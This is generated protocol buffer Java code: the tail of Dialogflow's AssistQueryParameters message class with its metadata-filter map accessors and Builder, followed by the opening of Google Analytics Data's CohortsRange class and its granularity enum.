containsDocumentsMetadataFilters(java.lang.String key) { if (key == null) { throw new NullPointerException("map key"); } return internalGetDocumentsMetadataFilters().getMap().containsKey(key); } /** Use {@link #getDocumentsMetadataFiltersMap()} instead. */ @java.lang.Override @java.lang.Deprecated public java.util.Map<java.lang.String, java.lang.String> getDocumentsMetadataFilters() { return getDocumentsMetadataFiltersMap(); } /** * * * <pre> * Key-value filters on the metadata of documents returned by article * suggestion. If specified, article suggestion only returns suggested * documents that match all filters in their * [Document.metadata][google.cloud.dialogflow.v2beta1.Document.metadata]. * Multiple values for a metadata key should be concatenated by comma. 
For * example, filters to match all documents that have 'US' or 'CA' in their * market metadata values and 'agent' in their user metadata values will be * ``` * documents_metadata_filters { * key: "market" * value: "US,CA" * } * documents_metadata_filters { * key: "user" * value: "agent" * } * ``` * </pre> * * <code>map&lt;string, string&gt; documents_metadata_filters = 1;</code> */ @java.lang.Override public java.util.Map<java.lang.String, java.lang.String> getDocumentsMetadataFiltersMap() { return internalGetDocumentsMetadataFilters().getMap(); } /** * * * <pre> * Key-value filters on the metadata of documents returned by article * suggestion. If specified, article suggestion only returns suggested * documents that match all filters in their * [Document.metadata][google.cloud.dialogflow.v2beta1.Document.metadata]. * Multiple values for a metadata key should be concatenated by comma. For * example, filters to match all documents that have 'US' or 'CA' in their * market metadata values and 'agent' in their user metadata values will be * ``` * documents_metadata_filters { * key: "market" * value: "US,CA" * } * documents_metadata_filters { * key: "user" * value: "agent" * } * ``` * </pre> * * <code>map&lt;string, string&gt; documents_metadata_filters = 1;</code> */ @java.lang.Override public /* nullable */ java.lang.String getDocumentsMetadataFiltersOrDefault( java.lang.String key, /* nullable */ java.lang.String defaultValue) { if (key == null) { throw new NullPointerException("map key"); } java.util.Map<java.lang.String, java.lang.String> map = internalGetDocumentsMetadataFilters().getMap(); return map.containsKey(key) ? map.get(key) : defaultValue; } /** * * * <pre> * Key-value filters on the metadata of documents returned by article * suggestion. If specified, article suggestion only returns suggested * documents that match all filters in their * [Document.metadata][google.cloud.dialogflow.v2beta1.Document.metadata]. 
* Multiple values for a metadata key should be concatenated by comma. For * example, filters to match all documents that have 'US' or 'CA' in their * market metadata values and 'agent' in their user metadata values will be * ``` * documents_metadata_filters { * key: "market" * value: "US,CA" * } * documents_metadata_filters { * key: "user" * value: "agent" * } * ``` * </pre> * * <code>map&lt;string, string&gt; documents_metadata_filters = 1;</code> */ @java.lang.Override public java.lang.String getDocumentsMetadataFiltersOrThrow(java.lang.String key) { if (key == null) { throw new NullPointerException("map key"); } java.util.Map<java.lang.String, java.lang.String> map = internalGetDocumentsMetadataFilters().getMap(); if (!map.containsKey(key)) { throw new java.lang.IllegalArgumentException(); } return map.get(key); } private byte memoizedIsInitialized = -1; @java.lang.Override public final boolean isInitialized() { byte isInitialized = memoizedIsInitialized; if (isInitialized == 1) return true; if (isInitialized == 0) return false; memoizedIsInitialized = 1; return true; } @java.lang.Override public void writeTo(com.google.protobuf.CodedOutputStream output) throws java.io.IOException { com.google.protobuf.GeneratedMessageV3.serializeStringMapTo( output, internalGetDocumentsMetadataFilters(), DocumentsMetadataFiltersDefaultEntryHolder.defaultEntry, 1); getUnknownFields().writeTo(output); } @java.lang.Override public int getSerializedSize() { int size = memoizedSize; if (size != -1) return size; size = 0; for (java.util.Map.Entry<java.lang.String, java.lang.String> entry : internalGetDocumentsMetadataFilters().getMap().entrySet()) { com.google.protobuf.MapEntry<java.lang.String, java.lang.String> documentsMetadataFilters__ = DocumentsMetadataFiltersDefaultEntryHolder.defaultEntry .newBuilderForType() .setKey(entry.getKey()) .setValue(entry.getValue()) .build(); size += com.google.protobuf.CodedOutputStream.computeMessageSize(1, documentsMetadataFilters__); } size += 
getUnknownFields().getSerializedSize(); memoizedSize = size; return size; } @java.lang.Override public boolean equals(final java.lang.Object obj) { if (obj == this) { return true; } if (!(obj instanceof com.google.cloud.dialogflow.v2beta1.AssistQueryParameters)) { return super.equals(obj); } com.google.cloud.dialogflow.v2beta1.AssistQueryParameters other = (com.google.cloud.dialogflow.v2beta1.AssistQueryParameters) obj; if (!internalGetDocumentsMetadataFilters().equals(other.internalGetDocumentsMetadataFilters())) return false; if (!getUnknownFields().equals(other.getUnknownFields())) return false; return true; } @java.lang.Override public int hashCode() { if (memoizedHashCode != 0) { return memoizedHashCode; } int hash = 41; hash = (19 * hash) + getDescriptor().hashCode(); if (!internalGetDocumentsMetadataFilters().getMap().isEmpty()) { hash = (37 * hash) + DOCUMENTS_METADATA_FILTERS_FIELD_NUMBER; hash = (53 * hash) + internalGetDocumentsMetadataFilters().hashCode(); } hash = (29 * hash) + getUnknownFields().hashCode(); memoizedHashCode = hash; return hash; } public static com.google.cloud.dialogflow.v2beta1.AssistQueryParameters parseFrom( java.nio.ByteBuffer data) throws com.google.protobuf.InvalidProtocolBufferException { return PARSER.parseFrom(data); } public static com.google.cloud.dialogflow.v2beta1.AssistQueryParameters parseFrom( java.nio.ByteBuffer data, com.google.protobuf.ExtensionRegistryLite extensionRegistry) throws com.google.protobuf.InvalidProtocolBufferException { return PARSER.parseFrom(data, extensionRegistry); } public static com.google.cloud.dialogflow.v2beta1.AssistQueryParameters parseFrom( com.google.protobuf.ByteString data) throws com.google.protobuf.InvalidProtocolBufferException { return PARSER.parseFrom(data); } public static com.google.cloud.dialogflow.v2beta1.AssistQueryParameters parseFrom( com.google.protobuf.ByteString data, com.google.protobuf.ExtensionRegistryLite extensionRegistry) throws 
com.google.protobuf.InvalidProtocolBufferException { return PARSER.parseFrom(data, extensionRegistry); } public static com.google.cloud.dialogflow.v2beta1.AssistQueryParameters parseFrom(byte[] data) throws com.google.protobuf.InvalidProtocolBufferException { return PARSER.parseFrom(data); } public static com.google.cloud.dialogflow.v2beta1.AssistQueryParameters parseFrom( byte[] data, com.google.protobuf.ExtensionRegistryLite extensionRegistry) throws com.google.protobuf.InvalidProtocolBufferException { return PARSER.parseFrom(data, extensionRegistry); } public static com.google.cloud.dialogflow.v2beta1.AssistQueryParameters parseFrom( java.io.InputStream input) throws java.io.IOException { return com.google.protobuf.GeneratedMessageV3.parseWithIOException(PARSER, input); } public static com.google.cloud.dialogflow.v2beta1.AssistQueryParameters parseFrom( java.io.InputStream input, com.google.protobuf.ExtensionRegistryLite extensionRegistry) throws java.io.IOException { return com.google.protobuf.GeneratedMessageV3.parseWithIOException( PARSER, input, extensionRegistry); } public static com.google.cloud.dialogflow.v2beta1.AssistQueryParameters parseDelimitedFrom( java.io.InputStream input) throws java.io.IOException { return com.google.protobuf.GeneratedMessageV3.parseDelimitedWithIOException(PARSER, input); } public static com.google.cloud.dialogflow.v2beta1.AssistQueryParameters parseDelimitedFrom( java.io.InputStream input, com.google.protobuf.ExtensionRegistryLite extensionRegistry) throws java.io.IOException { return com.google.protobuf.GeneratedMessageV3.parseDelimitedWithIOException( PARSER, input, extensionRegistry); } public static com.google.cloud.dialogflow.v2beta1.AssistQueryParameters parseFrom( com.google.protobuf.CodedInputStream input) throws java.io.IOException { return com.google.protobuf.GeneratedMessageV3.parseWithIOException(PARSER, input); } public static com.google.cloud.dialogflow.v2beta1.AssistQueryParameters parseFrom( 
com.google.protobuf.CodedInputStream input, com.google.protobuf.ExtensionRegistryLite extensionRegistry) throws java.io.IOException { return com.google.protobuf.GeneratedMessageV3.parseWithIOException( PARSER, input, extensionRegistry); } @java.lang.Override public Builder newBuilderForType() { return newBuilder(); } public static Builder newBuilder() { return DEFAULT_INSTANCE.toBuilder(); } public static Builder newBuilder( com.google.cloud.dialogflow.v2beta1.AssistQueryParameters prototype) { return DEFAULT_INSTANCE.toBuilder().mergeFrom(prototype); } @java.lang.Override public Builder toBuilder() { return this == DEFAULT_INSTANCE ? new Builder() : new Builder().mergeFrom(this); } @java.lang.Override protected Builder newBuilderForType(com.google.protobuf.GeneratedMessageV3.BuilderParent parent) { Builder builder = new Builder(parent); return builder; } /** * * * <pre> * Represents the parameters of human assist query. * </pre> * * Protobuf type {@code google.cloud.dialogflow.v2beta1.AssistQueryParameters} */ public static final class Builder extends com.google.protobuf.GeneratedMessageV3.Builder<Builder> implements // @@protoc_insertion_point(builder_implements:google.cloud.dialogflow.v2beta1.AssistQueryParameters) com.google.cloud.dialogflow.v2beta1.AssistQueryParametersOrBuilder { public static final com.google.protobuf.Descriptors.Descriptor getDescriptor() { return com.google.cloud.dialogflow.v2beta1.ParticipantProto .internal_static_google_cloud_dialogflow_v2beta1_AssistQueryParameters_descriptor; } @SuppressWarnings({"rawtypes"}) protected com.google.protobuf.MapFieldReflectionAccessor internalGetMapFieldReflection( int number) { switch (number) { case 1: return internalGetDocumentsMetadataFilters(); default: throw new RuntimeException("Invalid map field number: " + number); } } @SuppressWarnings({"rawtypes"}) protected com.google.protobuf.MapFieldReflectionAccessor internalGetMutableMapFieldReflection( int number) { switch (number) { case 1: return 
internalGetMutableDocumentsMetadataFilters(); default: throw new RuntimeException("Invalid map field number: " + number); } } @java.lang.Override protected com.google.protobuf.GeneratedMessageV3.FieldAccessorTable internalGetFieldAccessorTable() { return com.google.cloud.dialogflow.v2beta1.ParticipantProto .internal_static_google_cloud_dialogflow_v2beta1_AssistQueryParameters_fieldAccessorTable .ensureFieldAccessorsInitialized( com.google.cloud.dialogflow.v2beta1.AssistQueryParameters.class, com.google.cloud.dialogflow.v2beta1.AssistQueryParameters.Builder.class); } // Construct using com.google.cloud.dialogflow.v2beta1.AssistQueryParameters.newBuilder() private Builder() {} private Builder(com.google.protobuf.GeneratedMessageV3.BuilderParent parent) { super(parent); } @java.lang.Override public Builder clear() { super.clear(); bitField0_ = 0; internalGetMutableDocumentsMetadataFilters().clear(); return this; } @java.lang.Override public com.google.protobuf.Descriptors.Descriptor getDescriptorForType() { return com.google.cloud.dialogflow.v2beta1.ParticipantProto .internal_static_google_cloud_dialogflow_v2beta1_AssistQueryParameters_descriptor; } @java.lang.Override public com.google.cloud.dialogflow.v2beta1.AssistQueryParameters getDefaultInstanceForType() { return com.google.cloud.dialogflow.v2beta1.AssistQueryParameters.getDefaultInstance(); } @java.lang.Override public com.google.cloud.dialogflow.v2beta1.AssistQueryParameters build() { com.google.cloud.dialogflow.v2beta1.AssistQueryParameters result = buildPartial(); if (!result.isInitialized()) { throw newUninitializedMessageException(result); } return result; } @java.lang.Override public com.google.cloud.dialogflow.v2beta1.AssistQueryParameters buildPartial() { com.google.cloud.dialogflow.v2beta1.AssistQueryParameters result = new com.google.cloud.dialogflow.v2beta1.AssistQueryParameters(this); if (bitField0_ != 0) { buildPartial0(result); } onBuilt(); return result; } private void 
buildPartial0(com.google.cloud.dialogflow.v2beta1.AssistQueryParameters result) { int from_bitField0_ = bitField0_; if (((from_bitField0_ & 0x00000001) != 0)) { result.documentsMetadataFilters_ = internalGetDocumentsMetadataFilters(); result.documentsMetadataFilters_.makeImmutable(); } } @java.lang.Override public Builder clone() { return super.clone(); } @java.lang.Override public Builder setField( com.google.protobuf.Descriptors.FieldDescriptor field, java.lang.Object value) { return super.setField(field, value); } @java.lang.Override public Builder clearField(com.google.protobuf.Descriptors.FieldDescriptor field) { return super.clearField(field); } @java.lang.Override public Builder clearOneof(com.google.protobuf.Descriptors.OneofDescriptor oneof) { return super.clearOneof(oneof); } @java.lang.Override public Builder setRepeatedField( com.google.protobuf.Descriptors.FieldDescriptor field, int index, java.lang.Object value) { return super.setRepeatedField(field, index, value); } @java.lang.Override public Builder addRepeatedField( com.google.protobuf.Descriptors.FieldDescriptor field, java.lang.Object value) { return super.addRepeatedField(field, value); } @java.lang.Override public Builder mergeFrom(com.google.protobuf.Message other) { if (other instanceof com.google.cloud.dialogflow.v2beta1.AssistQueryParameters) { return mergeFrom((com.google.cloud.dialogflow.v2beta1.AssistQueryParameters) other); } else { super.mergeFrom(other); return this; } } public Builder mergeFrom(com.google.cloud.dialogflow.v2beta1.AssistQueryParameters other) { if (other == com.google.cloud.dialogflow.v2beta1.AssistQueryParameters.getDefaultInstance()) return this; internalGetMutableDocumentsMetadataFilters() .mergeFrom(other.internalGetDocumentsMetadataFilters()); bitField0_ |= 0x00000001; this.mergeUnknownFields(other.getUnknownFields()); onChanged(); return this; } @java.lang.Override public final boolean isInitialized() { return true; } @java.lang.Override public Builder 
mergeFrom( com.google.protobuf.CodedInputStream input, com.google.protobuf.ExtensionRegistryLite extensionRegistry) throws java.io.IOException { if (extensionRegistry == null) { throw new java.lang.NullPointerException(); } try { boolean done = false; while (!done) { int tag = input.readTag(); switch (tag) { case 0: done = true; break; case 10: { com.google.protobuf.MapEntry<java.lang.String, java.lang.String> documentsMetadataFilters__ = input.readMessage( DocumentsMetadataFiltersDefaultEntryHolder.defaultEntry .getParserForType(), extensionRegistry); internalGetMutableDocumentsMetadataFilters() .getMutableMap() .put( documentsMetadataFilters__.getKey(), documentsMetadataFilters__.getValue()); bitField0_ |= 0x00000001; break; } // case 10 default: { if (!super.parseUnknownField(input, extensionRegistry, tag)) { done = true; // was an endgroup tag } break; } // default: } // switch (tag) } // while (!done) } catch (com.google.protobuf.InvalidProtocolBufferException e) { throw e.unwrapIOException(); } finally { onChanged(); } // finally return this; } private int bitField0_; private com.google.protobuf.MapField<java.lang.String, java.lang.String> documentsMetadataFilters_; private com.google.protobuf.MapField<java.lang.String, java.lang.String> internalGetDocumentsMetadataFilters() { if (documentsMetadataFilters_ == null) { return com.google.protobuf.MapField.emptyMapField( DocumentsMetadataFiltersDefaultEntryHolder.defaultEntry); } return documentsMetadataFilters_; } private com.google.protobuf.MapField<java.lang.String, java.lang.String> internalGetMutableDocumentsMetadataFilters() { if (documentsMetadataFilters_ == null) { documentsMetadataFilters_ = com.google.protobuf.MapField.newMapField( DocumentsMetadataFiltersDefaultEntryHolder.defaultEntry); } if (!documentsMetadataFilters_.isMutable()) { documentsMetadataFilters_ = documentsMetadataFilters_.copy(); } bitField0_ |= 0x00000001; onChanged(); return documentsMetadataFilters_; } public int 
getDocumentsMetadataFiltersCount() { return internalGetDocumentsMetadataFilters().getMap().size(); } /** * * * <pre> * Key-value filters on the metadata of documents returned by article * suggestion. If specified, article suggestion only returns suggested * documents that match all filters in their * [Document.metadata][google.cloud.dialogflow.v2beta1.Document.metadata]. * Multiple values for a metadata key should be concatenated by comma. For * example, filters to match all documents that have 'US' or 'CA' in their * market metadata values and 'agent' in their user metadata values will be * ``` * documents_metadata_filters { * key: "market" * value: "US,CA" * } * documents_metadata_filters { * key: "user" * value: "agent" * } * ``` * </pre> * * <code>map&lt;string, string&gt; documents_metadata_filters = 1;</code> */ @java.lang.Override public boolean containsDocumentsMetadataFilters(java.lang.String key) { if (key == null) { throw new NullPointerException("map key"); } return internalGetDocumentsMetadataFilters().getMap().containsKey(key); } /** Use {@link #getDocumentsMetadataFiltersMap()} instead. */ @java.lang.Override @java.lang.Deprecated public java.util.Map<java.lang.String, java.lang.String> getDocumentsMetadataFilters() { return getDocumentsMetadataFiltersMap(); } /** * * * <pre> * Key-value filters on the metadata of documents returned by article * suggestion. If specified, article suggestion only returns suggested * documents that match all filters in their * [Document.metadata][google.cloud.dialogflow.v2beta1.Document.metadata]. * Multiple values for a metadata key should be concatenated by comma. 
For * example, filters to match all documents that have 'US' or 'CA' in their * market metadata values and 'agent' in their user metadata values will be * ``` * documents_metadata_filters { * key: "market" * value: "US,CA" * } * documents_metadata_filters { * key: "user" * value: "agent" * } * ``` * </pre> * * <code>map&lt;string, string&gt; documents_metadata_filters = 1;</code> */ @java.lang.Override public java.util.Map<java.lang.String, java.lang.String> getDocumentsMetadataFiltersMap() { return internalGetDocumentsMetadataFilters().getMap(); } /** * * * <pre> * Key-value filters on the metadata of documents returned by article * suggestion. If specified, article suggestion only returns suggested * documents that match all filters in their * [Document.metadata][google.cloud.dialogflow.v2beta1.Document.metadata]. * Multiple values for a metadata key should be concatenated by comma. For * example, filters to match all documents that have 'US' or 'CA' in their * market metadata values and 'agent' in their user metadata values will be * ``` * documents_metadata_filters { * key: "market" * value: "US,CA" * } * documents_metadata_filters { * key: "user" * value: "agent" * } * ``` * </pre> * * <code>map&lt;string, string&gt; documents_metadata_filters = 1;</code> */ @java.lang.Override public /* nullable */ java.lang.String getDocumentsMetadataFiltersOrDefault( java.lang.String key, /* nullable */ java.lang.String defaultValue) { if (key == null) { throw new NullPointerException("map key"); } java.util.Map<java.lang.String, java.lang.String> map = internalGetDocumentsMetadataFilters().getMap(); return map.containsKey(key) ? map.get(key) : defaultValue; } /** * * * <pre> * Key-value filters on the metadata of documents returned by article * suggestion. If specified, article suggestion only returns suggested * documents that match all filters in their * [Document.metadata][google.cloud.dialogflow.v2beta1.Document.metadata]. 
* Multiple values for a metadata key should be concatenated by comma. For * example, filters to match all documents that have 'US' or 'CA' in their * market metadata values and 'agent' in their user metadata values will be * ``` * documents_metadata_filters { * key: "market" * value: "US,CA" * } * documents_metadata_filters { * key: "user" * value: "agent" * } * ``` * </pre> * * <code>map&lt;string, string&gt; documents_metadata_filters = 1;</code> */ @java.lang.Override public java.lang.String getDocumentsMetadataFiltersOrThrow(java.lang.String key) { if (key == null) { throw new NullPointerException("map key"); } java.util.Map<java.lang.String, java.lang.String> map = internalGetDocumentsMetadataFilters().getMap(); if (!map.containsKey(key)) { throw new java.lang.IllegalArgumentException(); } return map.get(key); } public Builder clearDocumentsMetadataFilters() { bitField0_ = (bitField0_ & ~0x00000001); internalGetMutableDocumentsMetadataFilters().getMutableMap().clear(); return this; } /** * * * <pre> * Key-value filters on the metadata of documents returned by article * suggestion. If specified, article suggestion only returns suggested * documents that match all filters in their * [Document.metadata][google.cloud.dialogflow.v2beta1.Document.metadata]. * Multiple values for a metadata key should be concatenated by comma. 
For * example, filters to match all documents that have 'US' or 'CA' in their * market metadata values and 'agent' in their user metadata values will be * ``` * documents_metadata_filters { * key: "market" * value: "US,CA" * } * documents_metadata_filters { * key: "user" * value: "agent" * } * ``` * </pre> * * <code>map&lt;string, string&gt; documents_metadata_filters = 1;</code> */ public Builder removeDocumentsMetadataFilters(java.lang.String key) { if (key == null) { throw new NullPointerException("map key"); } internalGetMutableDocumentsMetadataFilters().getMutableMap().remove(key); return this; } /** Use alternate mutation accessors instead. */ @java.lang.Deprecated public java.util.Map<java.lang.String, java.lang.String> getMutableDocumentsMetadataFilters() { bitField0_ |= 0x00000001; return internalGetMutableDocumentsMetadataFilters().getMutableMap(); } /** * * * <pre> * Key-value filters on the metadata of documents returned by article * suggestion. If specified, article suggestion only returns suggested * documents that match all filters in their * [Document.metadata][google.cloud.dialogflow.v2beta1.Document.metadata]. * Multiple values for a metadata key should be concatenated by comma. 
For * example, filters to match all documents that have 'US' or 'CA' in their * market metadata values and 'agent' in their user metadata values will be * ``` * documents_metadata_filters { * key: "market" * value: "US,CA" * } * documents_metadata_filters { * key: "user" * value: "agent" * } * ``` * </pre> * * <code>map&lt;string, string&gt; documents_metadata_filters = 1;</code> */ public Builder putDocumentsMetadataFilters(java.lang.String key, java.lang.String value) { if (key == null) { throw new NullPointerException("map key"); } if (value == null) { throw new NullPointerException("map value"); } internalGetMutableDocumentsMetadataFilters().getMutableMap().put(key, value); bitField0_ |= 0x00000001; return this; } /** * * * <pre> * Key-value filters on the metadata of documents returned by article * suggestion. If specified, article suggestion only returns suggested * documents that match all filters in their * [Document.metadata][google.cloud.dialogflow.v2beta1.Document.metadata]. * Multiple values for a metadata key should be concatenated by comma. 
For * example, filters to match all documents that have 'US' or 'CA' in their * market metadata values and 'agent' in their user metadata values will be * ``` * documents_metadata_filters { * key: "market" * value: "US,CA" * } * documents_metadata_filters { * key: "user" * value: "agent" * } * ``` * </pre> * * <code>map&lt;string, string&gt; documents_metadata_filters = 1;</code> */ public Builder putAllDocumentsMetadataFilters( java.util.Map<java.lang.String, java.lang.String> values) { internalGetMutableDocumentsMetadataFilters().getMutableMap().putAll(values); bitField0_ |= 0x00000001; return this; } @java.lang.Override public final Builder setUnknownFields(final com.google.protobuf.UnknownFieldSet unknownFields) { return super.setUnknownFields(unknownFields); } @java.lang.Override public final Builder mergeUnknownFields( final com.google.protobuf.UnknownFieldSet unknownFields) { return super.mergeUnknownFields(unknownFields); } // @@protoc_insertion_point(builder_scope:google.cloud.dialogflow.v2beta1.AssistQueryParameters) } // @@protoc_insertion_point(class_scope:google.cloud.dialogflow.v2beta1.AssistQueryParameters) private static final com.google.cloud.dialogflow.v2beta1.AssistQueryParameters DEFAULT_INSTANCE; static { DEFAULT_INSTANCE = new com.google.cloud.dialogflow.v2beta1.AssistQueryParameters(); } public static com.google.cloud.dialogflow.v2beta1.AssistQueryParameters getDefaultInstance() { return DEFAULT_INSTANCE; } private static final com.google.protobuf.Parser<AssistQueryParameters> PARSER = new com.google.protobuf.AbstractParser<AssistQueryParameters>() { @java.lang.Override public AssistQueryParameters parsePartialFrom( com.google.protobuf.CodedInputStream input, com.google.protobuf.ExtensionRegistryLite extensionRegistry) throws com.google.protobuf.InvalidProtocolBufferException { Builder builder = newBuilder(); try { builder.mergeFrom(input, extensionRegistry); } catch (com.google.protobuf.InvalidProtocolBufferException e) { throw 
e.setUnfinishedMessage(builder.buildPartial()); } catch (com.google.protobuf.UninitializedMessageException e) { throw e.asInvalidProtocolBufferException().setUnfinishedMessage(builder.buildPartial()); } catch (java.io.IOException e) { throw new com.google.protobuf.InvalidProtocolBufferException(e) .setUnfinishedMessage(builder.buildPartial()); } return builder.buildPartial(); } }; public static com.google.protobuf.Parser<AssistQueryParameters> parser() { return PARSER; } @java.lang.Override public com.google.protobuf.Parser<AssistQueryParameters> getParserForType() { return PARSER; } @java.lang.Override public com.google.cloud.dialogflow.v2beta1.AssistQueryParameters getDefaultInstanceForType() { return DEFAULT_INSTANCE; } }
googleapis/google-cloud-java
35,816
java-analytics-data/proto-google-analytics-data-v1beta/src/main/java/com/google/analytics/data/v1beta/CohortsRange.java
/* * Copyright 2025 Google LLC * * Licensed under the Apache License, Version 2.0 (the "License"); * you may not use this file except in compliance with the License. * You may obtain a copy of the License at * * https://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. * See the License for the specific language governing permissions and * limitations under the License. */ // Generated by the protocol buffer compiler. DO NOT EDIT! // source: google/analytics/data/v1beta/data.proto // Protobuf Java Version: 3.25.8 package com.google.analytics.data.v1beta; /** * * * <pre> * Configures the extended reporting date range for a cohort report. Specifies * an offset duration to follow the cohorts over. * </pre> * * Protobuf type {@code google.analytics.data.v1beta.CohortsRange} */ public final class CohortsRange extends com.google.protobuf.GeneratedMessageV3 implements // @@protoc_insertion_point(message_implements:google.analytics.data.v1beta.CohortsRange) CohortsRangeOrBuilder { private static final long serialVersionUID = 0L; // Use CohortsRange.newBuilder() to construct. 
private CohortsRange(com.google.protobuf.GeneratedMessageV3.Builder<?> builder) { super(builder); } private CohortsRange() { granularity_ = 0; } @java.lang.Override @SuppressWarnings({"unused"}) protected java.lang.Object newInstance(UnusedPrivateParameter unused) { return new CohortsRange(); } public static final com.google.protobuf.Descriptors.Descriptor getDescriptor() { return com.google.analytics.data.v1beta.ReportingApiProto .internal_static_google_analytics_data_v1beta_CohortsRange_descriptor; } @java.lang.Override protected com.google.protobuf.GeneratedMessageV3.FieldAccessorTable internalGetFieldAccessorTable() { return com.google.analytics.data.v1beta.ReportingApiProto .internal_static_google_analytics_data_v1beta_CohortsRange_fieldAccessorTable .ensureFieldAccessorsInitialized( com.google.analytics.data.v1beta.CohortsRange.class, com.google.analytics.data.v1beta.CohortsRange.Builder.class); } /** * * * <pre> * The granularity used to interpret the `startOffset` and `endOffset` for the * extended reporting date range for a cohort report. * </pre> * * Protobuf enum {@code google.analytics.data.v1beta.CohortsRange.Granularity} */ public enum Granularity implements com.google.protobuf.ProtocolMessageEnum { /** * * * <pre> * Should never be specified. * </pre> * * <code>GRANULARITY_UNSPECIFIED = 0;</code> */ GRANULARITY_UNSPECIFIED(0), /** * * * <pre> * Daily granularity. Commonly used if the cohort's `dateRange` is a single * day and the request contains `cohortNthDay`. * </pre> * * <code>DAILY = 1;</code> */ DAILY(1), /** * * * <pre> * Weekly granularity. Commonly used if the cohort's `dateRange` is a week * in duration (starting on Sunday and ending on Saturday) and the request * contains `cohortNthWeek`. * </pre> * * <code>WEEKLY = 2;</code> */ WEEKLY(2), /** * * * <pre> * Monthly granularity. Commonly used if the cohort's `dateRange` is a month * in duration and the request contains `cohortNthMonth`. 
* </pre> * * <code>MONTHLY = 3;</code> */ MONTHLY(3), UNRECOGNIZED(-1), ; /** * * * <pre> * Should never be specified. * </pre> * * <code>GRANULARITY_UNSPECIFIED = 0;</code> */ public static final int GRANULARITY_UNSPECIFIED_VALUE = 0; /** * * * <pre> * Daily granularity. Commonly used if the cohort's `dateRange` is a single * day and the request contains `cohortNthDay`. * </pre> * * <code>DAILY = 1;</code> */ public static final int DAILY_VALUE = 1; /** * * * <pre> * Weekly granularity. Commonly used if the cohort's `dateRange` is a week * in duration (starting on Sunday and ending on Saturday) and the request * contains `cohortNthWeek`. * </pre> * * <code>WEEKLY = 2;</code> */ public static final int WEEKLY_VALUE = 2; /** * * * <pre> * Monthly granularity. Commonly used if the cohort's `dateRange` is a month * in duration and the request contains `cohortNthMonth`. * </pre> * * <code>MONTHLY = 3;</code> */ public static final int MONTHLY_VALUE = 3; public final int getNumber() { if (this == UNRECOGNIZED) { throw new java.lang.IllegalArgumentException( "Can't get the number of an unknown enum value."); } return value; } /** * @param value The numeric wire value of the corresponding enum entry. * @return The enum associated with the given numeric wire value. * @deprecated Use {@link #forNumber(int)} instead. */ @java.lang.Deprecated public static Granularity valueOf(int value) { return forNumber(value); } /** * @param value The numeric wire value of the corresponding enum entry. * @return The enum associated with the given numeric wire value. 
*/ public static Granularity forNumber(int value) { switch (value) { case 0: return GRANULARITY_UNSPECIFIED; case 1: return DAILY; case 2: return WEEKLY; case 3: return MONTHLY; default: return null; } } public static com.google.protobuf.Internal.EnumLiteMap<Granularity> internalGetValueMap() { return internalValueMap; } private static final com.google.protobuf.Internal.EnumLiteMap<Granularity> internalValueMap = new com.google.protobuf.Internal.EnumLiteMap<Granularity>() { public Granularity findValueByNumber(int number) { return Granularity.forNumber(number); } }; public final com.google.protobuf.Descriptors.EnumValueDescriptor getValueDescriptor() { if (this == UNRECOGNIZED) { throw new java.lang.IllegalStateException( "Can't get the descriptor of an unrecognized enum value."); } return getDescriptor().getValues().get(ordinal()); } public final com.google.protobuf.Descriptors.EnumDescriptor getDescriptorForType() { return getDescriptor(); } public static final com.google.protobuf.Descriptors.EnumDescriptor getDescriptor() { return com.google.analytics.data.v1beta.CohortsRange.getDescriptor().getEnumTypes().get(0); } private static final Granularity[] VALUES = values(); public static Granularity valueOf(com.google.protobuf.Descriptors.EnumValueDescriptor desc) { if (desc.getType() != getDescriptor()) { throw new java.lang.IllegalArgumentException("EnumValueDescriptor is not for this type."); } if (desc.getIndex() == -1) { return UNRECOGNIZED; } return VALUES[desc.getIndex()]; } private final int value; private Granularity(int value) { this.value = value; } // @@protoc_insertion_point(enum_scope:google.analytics.data.v1beta.CohortsRange.Granularity) } public static final int GRANULARITY_FIELD_NUMBER = 1; private int granularity_ = 0; /** * * * <pre> * Required. The granularity used to interpret the `startOffset` and * `endOffset` for the extended reporting date range for a cohort report. 
* </pre> * * <code>.google.analytics.data.v1beta.CohortsRange.Granularity granularity = 1;</code> * * @return The enum numeric value on the wire for granularity. */ @java.lang.Override public int getGranularityValue() { return granularity_; } /** * * * <pre> * Required. The granularity used to interpret the `startOffset` and * `endOffset` for the extended reporting date range for a cohort report. * </pre> * * <code>.google.analytics.data.v1beta.CohortsRange.Granularity granularity = 1;</code> * * @return The granularity. */ @java.lang.Override public com.google.analytics.data.v1beta.CohortsRange.Granularity getGranularity() { com.google.analytics.data.v1beta.CohortsRange.Granularity result = com.google.analytics.data.v1beta.CohortsRange.Granularity.forNumber(granularity_); return result == null ? com.google.analytics.data.v1beta.CohortsRange.Granularity.UNRECOGNIZED : result; } public static final int START_OFFSET_FIELD_NUMBER = 2; private int startOffset_ = 0; /** * * * <pre> * `startOffset` specifies the start date of the extended reporting date range * for a cohort report. `startOffset` is commonly set to 0 so that reports * contain data from the acquisition of the cohort forward. * * If `granularity` is `DAILY`, the `startDate` of the extended reporting date * range is `startDate` of the cohort plus `startOffset` days. * * If `granularity` is `WEEKLY`, the `startDate` of the extended reporting * date range is `startDate` of the cohort plus `startOffset * 7` days. * * If `granularity` is `MONTHLY`, the `startDate` of the extended reporting * date range is `startDate` of the cohort plus `startOffset * 30` days. * </pre> * * <code>int32 start_offset = 2;</code> * * @return The startOffset. */ @java.lang.Override public int getStartOffset() { return startOffset_; } public static final int END_OFFSET_FIELD_NUMBER = 3; private int endOffset_ = 0; /** * * * <pre> * Required. `endOffset` specifies the end date of the extended reporting date * range for a cohort report. 
